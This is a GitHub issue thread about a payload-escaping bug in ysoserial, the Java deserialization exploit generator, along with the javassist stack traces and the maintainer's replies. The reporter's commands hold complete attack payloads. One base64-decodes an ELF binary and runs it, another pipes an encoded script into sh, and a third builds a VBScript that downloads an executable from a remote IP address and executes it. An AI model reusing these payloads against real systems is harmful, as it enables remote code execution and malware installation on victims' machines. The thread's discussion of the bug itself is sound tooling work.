### ISSUE TITLE
bug：javassist.CannotCompileException: [source error] ) is missing

### ISSUE THREAD

**Issue by hktalent** [frohoff/ysoserial#86]
```
java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'rm -rf ok.elf;echo "f0VMRgEAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toYUBReGgCAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZt2AhcB4Av/huAEAAAC7AQAAAM2A"|base64 -d>ok.elf;chmod 555 ok.elf;./ok.elf &'  > tmp/payload.bin

Picked up JAVA_TOOL_OPTIONS: -Dfile.encoding=UTF-8
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:119)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:101)
	at ysoserial.payloads.Jdk7u21.getObject(Jdk7u21.java:63)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 5 more
```

**Comment by hktalent** [comment]
```
so is ok
java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'echo cm0gLXJmIG9rLmVsZjtlY2hvICJmMFZNUmdFQkFRQUFBQUFBQUFBQUFBSUFBd0FCQUFBQVZJQUVDRFFBQUFBQUFBQUFBQUFBQURRQUlBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFJQUVDQUNBQkFqUEFBQUFTZ0VBQUFjQ1kdjM0MU5EVTJvQ3NHYUo0YzJBbDF0b1lVQlJlR2dDQURBNWllRnFabGhRVVZlSjRVUE5nSVhBZVJsT2REMW9vZ0FBQUZocUFHb0ZpZU14eWMyQWhjQjV2ZXNuc2dlNUFCQUFBSW5qd2VzTXdlTU1zSDNOZ0lYQWVCQmJpZUdadGd5d0E4MkFoY0I0QXYvaHVBRUFBQUM3QVFBQUFNMkEifGJhc2U2NCAtZD5vay5lbGY7Y2htb2QgNTU1IG9rLmVsZjsuL29rLmVsZiAmCg== |base64 -d|sh'> tmp/payload.bin
```

**Comment by frohoff** [comment]
I'd like to reopen this since it seems to be a genuine issue with escaping in the payload code generation

**Comment by frohoff** [comment]
Also seems to break with a different error in the `multiarg` branch

```console
$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'rm -rf ok.elf;echo "f0VMRgEAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toYUBReGgCAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZt2AhcB4Av/huAEAAAC7AQAAAM2A"|base64 -d>ok.elf;chmod 555 ok.elf;./ok.elf &'
Error while generating or serializing payload
javassist.CannotCompileException: [source error] syntax error near "t2AhcB4Av/huAEAAAC7A"
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:124)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:105)
	at ysoserial.payloads.Jdk7u21.getObject(Jdk7u21.java:63)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:38)
Caused by: compile error: syntax error near "t2AhcB4Av/huAEAAAC7A"
	at javassist.compiler.Parser.parseArrayInitializer(Parser.java:677)
	at javassist.compiler.Parser.parseNew(Parser.java:1287)
        ...
```

**Comment by hktalent** [comment]
thanks @frohoff 
```
java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar BeanShell1 'cmd.exe /c del poc.vbs& del mess.exe& @echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs&@echo objXMLHTTP.open "GET","http://192.168.24.10:9999/2410_4445.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLHTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFile "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objADOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=Nothing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs'

```

**Comment by hktalent** [comment]
@frohoff

**Comment by hktalent** [comment]
@frohoff #105

**Comment by frohoff** [comment]
Any of these errors should be resolved by #151
